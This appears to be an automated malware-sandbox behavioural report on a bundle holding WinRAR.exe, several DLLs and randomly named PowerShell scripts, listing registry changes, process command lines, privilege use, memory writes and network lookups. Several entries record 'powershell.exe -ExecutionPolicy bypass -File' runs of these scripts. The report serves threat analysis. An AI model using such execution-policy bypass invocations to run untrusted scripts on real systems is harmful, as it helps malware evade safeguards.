| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\DragDropHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shell | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\data\\AppInfo\\services\\WinRAR.exe\" \"%1\"" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\DragDropHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\ = "WinRAR archive" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shell\open | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\WinRAR32 | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\ContextMenuHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\DropHandler\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\data\\AppInfo\\services\\WinRAR.exe,1" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\shell | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\DropHandler\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\data\\AppInfo\\services\\WinRAR.exe,0" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\DropHandler | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\DragDropHandlers\WinRAR32 | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\data\\AppInfo\\services\\WinRAR.exe,0" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\ = "RAR recovery volume" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\DropHandler | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\WinRAR32 | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shell | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.rev\ = "WinRAR.REV" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\data\\AppInfo\\services\\WinRAR.exe\" \"%1\"" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe
"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1720 -s 2952
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | notifier.rarlab.com | udp |
| DE | 51.195.68.172:80 | notifier.rarlab.com | tcp |
| DE | 51.195.68.172:443 | notifier.rarlab.com | tcp |
| US | 8.8.8.8:53 | 172.68.195.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.169.19.2.in-addr.arpa | udp |
| DE | 51.195.68.172:443 | notifier.rarlab.com | tcp |
| US | 8.8.8.8:53 | 193.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.134.221.88.in-addr.arpa | udp |
| IE | 52.111.236.23:443 | | tcp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 190.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.16.208.104.in-addr.arpa | udp |
Files
Analysis: behavioral17
Detonation Overview
Submitted
2024-02-23 10:15
Reported
2024-02-23 10:22
Platform
win10-20240221-en
Max time kernel
128s
Max time network
136s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\Data\QsVakRcJSHTg.ps1
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x308
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 89.16.208.104.in-addr.arpa | udp |
Files
memory/3356-5-0x00007FFE62340000-0x00007FFE62D2C000-memory.dmp
memory/3356-4-0x0000014A38C10000-0x0000014A38C32000-memory.dmp
memory/3356-6-0x0000014A38A60000-0x0000014A38A70000-memory.dmp
memory/3356-7-0x0000014A38A60000-0x0000014A38A70000-memory.dmp
memory/3356-10-0x0000014A512E0000-0x0000014A51356000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pnusit1r.t20.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/3356-31-0x0000014A38A60000-0x0000014A38A70000-memory.dmp
memory/3356-37-0x00007FFE62340000-0x00007FFE62D2C000-memory.dmp
Analysis: behavioral21
Detonation Overview
Submitted
2024-02-23 10:15
Reported
2024-02-23 10:22
Platform
win10-20240221-en
Max time kernel
128s
Max time network
136s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\Qt5Core.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa | udp |
| US | 8.8.8.8:53 | 96.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 63.141.182.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.178.17.96.in-addr.arpa | udp |
Files
Analysis: behavioral26
Detonation Overview
Submitted
2024-02-23 10:15
Reported
2024-02-23 10:22
Platform
win10-20240221-en
Max time kernel
113s
Max time network
140s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\Tools\9syz0JDU8L0Z.ps1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 96.134.221.88.in-addr.arpa | udp |
Files
memory/4872-4-0x000002D670530000-0x000002D670552000-memory.dmp
memory/4872-5-0x00007FFF60DF0000-0x00007FFF617DC000-memory.dmp
memory/4872-6-0x000002D670AB0000-0x000002D670AC0000-memory.dmp
memory/4872-8-0x000002D670AB0000-0x000002D670AC0000-memory.dmp
memory/4872-10-0x000002D670BC0000-0x000002D670C36000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pbfvhjcj.fgz.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4872-33-0x000002D670AB0000-0x000002D670AC0000-memory.dmp
memory/4872-34-0x00007FFF60DF0000-0x00007FFF617DC000-memory.dmp
memory/4872-35-0x000002D670AB0000-0x000002D670AC0000-memory.dmp
memory/4872-36-0x000002D670AB0000-0x000002D670AC0000-memory.dmp
memory/4872-37-0x000002D670AB0000-0x000002D670AC0000-memory.dmp
Analysis: behavioral29
Detonation Overview
Submitted
2024-02-23 10:15
Reported
2024-02-23 10:23
Platform
win10-20240221-en
Max time kernel
114s
Max time network
136s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\UNRAR64.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 96.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.73.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 189.178.17.96.in-addr.arpa | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-02-23 10:15
Reported
2024-02-23 10:23
Platform
win10-20240221-en
Max time kernel
118s
Max time network
136s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\RIBTwoUATqEp.ps1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 129.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 121.150.79.40.in-addr.arpa | udp |
Files
memory/1364-4-0x000002AF3AAC0000-0x000002AF3AAE2000-memory.dmp
memory/1364-5-0x00007FFAABF20000-0x00007FFAAC90C000-memory.dmp
memory/1364-8-0x000002AF3AA30000-0x000002AF3AA40000-memory.dmp
memory/1364-9-0x000002AF3AA30000-0x000002AF3AA40000-memory.dmp
memory/1364-10-0x000002AF53270000-0x000002AF532E6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_e5pncfkb.0xq.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/1364-31-0x000002AF3AA30000-0x000002AF3AA40000-memory.dmp
memory/1364-34-0x00007FFAABF20000-0x00007FFAAC90C000-memory.dmp
memory/1364-35-0x000002AF3AA30000-0x000002AF3AA40000-memory.dmp
memory/1364-36-0x000002AF3AA30000-0x000002AF3AA40000-memory.dmp
memory/1364-37-0x000002AF3AA30000-0x000002AF3AA40000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2024-02-23 10:15
Reported
2024-02-23 10:22
Platform
win10-20240221-en
Max time kernel
117s
Max time network
137s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\WtFlkRqeJ61k.ps1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 129.134.221.88.in-addr.arpa | udp |
| US | 20.231.121.79:80 | | tcp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 177.178.17.96.in-addr.arpa | udp |
Files
memory/3012-4-0x0000019B0AA10000-0x0000019B0AA32000-memory.dmp
memory/3012-5-0x00007FFDDEC80000-0x00007FFDDF66C000-memory.dmp
memory/3012-6-0x0000019B23050000-0x0000019B23060000-memory.dmp
memory/3012-9-0x0000019B23160000-0x0000019B231D6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_q2ur3mid.bgj.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/3012-32-0x0000019B23050000-0x0000019B23060000-memory.dmp
memory/3012-33-0x00007FFDDEC80000-0x00007FFDDF66C000-memory.dmp
memory/3012-34-0x0000019B23050000-0x0000019B23060000-memory.dmp
memory/3012-35-0x0000019B23050000-0x0000019B23060000-memory.dmp
Analysis: behavioral30
Detonation Overview
Submitted
2024-02-23 10:15
Reported
2024-02-23 10:22
Platform
win10-20240221-en
Max time kernel
128s
Max time network
136s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4808 wrote to memory of 696 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4808 wrote to memory of 696 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4808 wrote to memory of 696 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\WCMICON2.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\WCMICON2.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.173.189.20.in-addr.arpa | udp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-02-23 10:15
Reported
2024-02-23 10:23
Platform
win10-20240221-en
Max time kernel
119s
Max time network
137s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\VO1DaL46eflm.ps1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 129.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.73.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.178.17.96.in-addr.arpa | udp |
Files
memory/4716-4-0x00000228F1290000-0x00000228F12B2000-memory.dmp
memory/4716-5-0x00007FFF28DA0000-0x00007FFF2978C000-memory.dmp
memory/4716-6-0x00000228F1110000-0x00000228F1120000-memory.dmp
memory/4716-9-0x00000228F1900000-0x00000228F1976000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vtdoqz04.3ky.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4716-30-0x00000228F1110000-0x00000228F1120000-memory.dmp
memory/4716-33-0x00007FFF28DA0000-0x00007FFF2978C000-memory.dmp
memory/4716-34-0x00000228F1110000-0x00000228F1120000-memory.dmp
Analysis: behavioral32
Detonation Overview
Submitted
2024-02-23 10:15
Reported
2024-02-23 10:22
Platform
win10-20240214-en
Max time kernel
118s
Max time network
129s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\WCMZIP64.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 96.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 177.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.71.105.51.in-addr.arpa | udp |
Files
Analysis: behavioral27
Detonation Overview
Submitted
2024-02-23 10:15
Reported
2024-02-23 10:22
Platform
win10-20240221-en
Max time kernel
64s
Max time network
90s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\Tools\NcHGDdjDw8Ov.ps1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 129.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
Files
memory/4372-4-0x000001613B3F0000-0x000001613B412000-memory.dmp
memory/4372-7-0x000001613B5A0000-0x000001613B616000-memory.dmp
memory/4372-16-0x00007FFAB2650000-0x00007FFAB303C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bf25stib.u4r.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4372-17-0x0000016122E60000-0x0000016122E70000-memory.dmp
memory/4372-18-0x0000016122E60000-0x0000016122E70000-memory.dmp
memory/4372-32-0x0000016122E60000-0x0000016122E70000-memory.dmp
memory/4372-34-0x00007FFAB2650000-0x00007FFAB303C000-memory.dmp
memory/4372-35-0x0000016122E60000-0x0000016122E70000-memory.dmp
memory/4372-36-0x0000016122E60000-0x0000016122E70000-memory.dmp
memory/4372-37-0x0000016122E60000-0x0000016122E70000-memory.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2024-02-23 10:15
Reported
2024-02-23 10:23
Platform
win10-20240214-en
Max time kernel
118s
Max time network
130s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\Data\jqP27MaT7teI.ps1
C:\Windows\system32\AUDIODG.EXE
